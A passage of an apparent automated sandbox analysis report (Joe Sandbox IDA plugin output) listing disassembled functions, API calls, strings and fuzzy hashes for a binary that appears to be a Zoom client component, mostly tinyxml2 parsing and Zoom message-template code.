                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Compare@?$State@StringUnlock@
                • String ID: App
                • API String ID: 824811217-4045616687
                • Opcode ID: fba676a8d12b7ece42415d7e29b5a0d57219c8f14008fb7ccc8fc7105d160449
                • Instruction ID: e3112c8e73d3290ed27d95e84d5b313e4ea93d4381936fde4f1cb6e2b6465611
                • Opcode Fuzzy Hash: fba676a8d12b7ece42415d7e29b5a0d57219c8f14008fb7ccc8fc7105d160449
                • Instruction Fuzzy Hash: 5711B276B0061AAF8B049F24CC5197EB369EF5A754B1D4069ED05E7341EB70FE058AF0
                Function 00CB00E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                Download Yara Rule
                APIs
                • ?ToInt@XMLUtil@tinyxml2@@SA_NPBDPAH@Z.RWSNDPQSKZ(?,00000000,?,?,00CB1094,00000000,?,?,00CA4611,?), ref: 00CB00EF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Int@Util@tinyxml2@@
                • String ID: false$true
                • API String ID: 1465290206-2658103896
                • Opcode ID: 2a563de87d0b15967ea301ace82953a2a3a8b1a1a7b70e565d54b6ccfa1becee
                • Instruction ID: 2e28a3e4bcc5355ffcdfe3b40c016ef7f03f54ac496cd05c6e0a1b580ef42db5
                • Opcode Fuzzy Hash: 2a563de87d0b15967ea301ace82953a2a3a8b1a1a7b70e565d54b6ccfa1becee
                • Instruction Fuzzy Hash: 8C11AC35104204EBDF098F19EC41BEF3BA8DB52358F208091EC15DB261D771DE02EBA0
                Function 00CB0AD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                Download Yara Rule
                APIs
                • ?ParseText@StrPair@tinyxml2@@QAEPADPADPBDHPAH@Z.RWSNDPQSKZ(?,]]>,00000002,?), ref: 00CB0AED
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000009,?,00000000), ref: 00CB0B01
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                • ?ParseText@StrPair@tinyxml2@@QAEPADPADPBDHPAH@Z.RWSNDPQSKZ(?,00D333A0,-00000002,?), ref: 00CB0B3D
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000008,?,00000000), ref: 00CB0B58
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Pair@tinyxml2@@$Document@tinyxml2@@Error@Error@2@ParseText@$Reset@Str@
                • String ID: ]]>
                • API String ID: 1961802644-1431394883
                • Opcode ID: 9f721e52a32d5a561c737e72bca5c45519dd807100a263b61e46c738cd9c376b
                • Instruction ID: 294d2181ac440868afb3bc1df48488cf401ffb7700152b2e51e7f12ccb5b73e0
                • Opcode Fuzzy Hash: 9f721e52a32d5a561c737e72bca5c45519dd807100a263b61e46c738cd9c376b
                • Instruction Fuzzy Hash: 24110431200B01BFDB365A55CC02FE77B95EF01744F18846DF567964A2E672E954E780
                Function 00CBCEE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3_
                • String ID: IdleHandler
                • API String ID: 2427045233-4254342604
                • Opcode ID: 9a2d5d8adbd19b6f7e921ba16affaa63c73e6753d1f4613c784037123742655b
                • Instruction ID: ffba7bb7c21aa9fb9e16c34f4fc902dafbd05743bd41c502361ab68c54a0fe92
                • Opcode Fuzzy Hash: 9a2d5d8adbd19b6f7e921ba16affaa63c73e6753d1f4613c784037123742655b
                • Instruction Fuzzy Hash: 74114CB4D002099FCB04EFE5D8D18FDBBB5BB18305F804069E811B6601EB709A48DB64
                Function 00CBE3B8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45fileCOMMON
                Download Yara Rule
                APIs
                • DeleteFileW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00CADE9D,?,00000004), ref: 00CBE3E0
                • DeleteFileW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00CADE9D,?,00000004), ref: 00CBE3FD
                • OutputDebugStringW.KERNEL32(DeleteFilePath failed for file:,?,00000000,00000000,00000000,?,00CADE9D,?,00000004), ref: 00CBE40E
                • OutputDebugStringW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00CADE9D,?,00000004), ref: 00CBE41D
                  • Part of subcall function 00CBE33A: OpenProcess.KERNEL32(001FFFFF,00000000,?,00000080,00000003,?,?,00CBE6C5,00000000), ref: 00CBE352
                  • Part of subcall function 00CBE33A: GetLastError.KERNEL32(?,?,00CBE6C5,00000000,?,?,?,?,?,?,?,?,?,?,0000003C,00CADEA7), ref: 00CBE35E
                Strings
                • DeleteFilePath failed for file:, xrefs: 00CBE409
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: DebugDeleteFileOutputString$ErrorLastOpenProcess
                • String ID: DeleteFilePath failed for file:
                • API String ID: 3681180181-2314946318
                • Opcode ID: 2e1aef561f8fff4ce58fa1683178411ab6609af8db3d2388bc839bc80af92175
                • Instruction ID: 616f7d24b4f3c66a70e9df20f5d6769e20bc04a60d1a1c8456edde555e53bf3b
                • Opcode Fuzzy Hash: 2e1aef561f8fff4ce58fa1683178411ab6609af8db3d2388bc839bc80af92175
                • Instruction Fuzzy Hash: 5501A235500710EBCB205B59EC488CAB7FAEF84B11F14452AF442D3220DF70AA468AB5
                Function 00CB26D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                Download Yara Rule
                APIs
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000004,00000000,filename=<null>), ref: 00CB26E6
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000004,00000000,filename=%s,00000000), ref: 00CB2710
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Document@tinyxml2@@Error@Error@2@Pair@tinyxml2@@$Reset@Str@
                • String ID: filename=%s$filename=<null>
                • API String ID: 4052038411-1949359620
                • Opcode ID: 641d65dc0c12120b87c16adf83eea1e8e0dd7c1de088b22a50e3c1583c4ee868
                • Instruction ID: 3b8cd75ac6095b1263d3bd0e1a19e4d6b8aeb730372053b1c78b9a2c4c6d0470
                • Opcode Fuzzy Hash: 641d65dc0c12120b87c16adf83eea1e8e0dd7c1de088b22a50e3c1583c4ee868
                • Instruction Fuzzy Hash: 84F0B47124070076DA253915EC82FDB364D9B14754F104015FA057A2C3DDB1E51165AD
                Function 00C76090 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76097
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.query.default.giphy.req,000027D1,myAccountId,defaultGiphyList,00000004), ref: 00C760B7
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: com.Zoom.app.conf.pmc.query.default.giphy.req$defaultGiphyList$myAccountId
                • API String ID: 9112088-1791266925
                • Opcode ID: 7c01381259eddae809e52b54ccea60154b99dc64b28730a71ddac2d8d72fb4e3
                • Instruction ID: 936532089230d9c76205dd6d662f4f334dd6c328a58239d019bf3cf833b90638
                • Opcode Fuzzy Hash: 7c01381259eddae809e52b54ccea60154b99dc64b28730a71ddac2d8d72fb4e3
                • Instruction Fuzzy Hash: 86E022F2A09A89ABD720BB44485AB5E3964AB40B09F500118B2044F7E0CBF00C00D376
                Function 00C74060 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74067
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.invitee.iak.response,00002773,buddy_id,iak,00000004), ref: 00C74087
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: buddy_id$com.Zoom.app.conf.invitee.iak.response$iak
                • API String ID: 9112088-2938952272
                • Opcode ID: 2beefc9fbe600a736cf620941d5fb547a74707b6ae6606020568d2a4a2519076
                • Instruction ID: b817d4a3f0dac9771902570e950eede1d43de6165744c14b75205a17d2a71dce
                • Opcode Fuzzy Hash: 2beefc9fbe600a736cf620941d5fb547a74707b6ae6606020568d2a4a2519076
                • Instruction Fuzzy Hash: 15E022B1A14345ABD320AB459C8AB1E22A4AF58B2AF00097AF6105F3D2CBF40C00D375
                Function 00C74200 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74207
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.start.request,00009D30,start,modelDirPath,00000004), ref: 00C74227
                  • Part of subcall function 00C8AEE0: __EH_prolog3.LIBCMT ref: 00C8AEE7
                  • Part of subcall function 00C8AEE0: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8AE42,?,?,?,?,00000004,00C6B83F,com.Zoom.app.notify.videolayout.download.status,00002775,status,message,data), ref: 00C8AEFA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.voice.command.start.request$modelDirPath$start
                • API String ID: 2715420528-1184729312
                • Opcode ID: d8bfe9975bf4fee2e6f4b4d5c667cf973d55e8132bdd9906d07e8a92f83f3597
                • Instruction ID: 004a424059dbe8a2e7c029d7c31dba6efc4c121f5a432e41f9ca677468976f92
                • Opcode Fuzzy Hash: d8bfe9975bf4fee2e6f4b4d5c667cf973d55e8132bdd9906d07e8a92f83f3597
                • Instruction Fuzzy Hash: ACE068B46803C9ABD710BB859C07B2F7164FB90B19F000A5CB5049A3C2CBF00D00D7B9
                Function 00C723E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C723E7
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getcurrentuser.response,00009E80,JsCallID,CurUserJson,00000004), ref: 00C72407
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
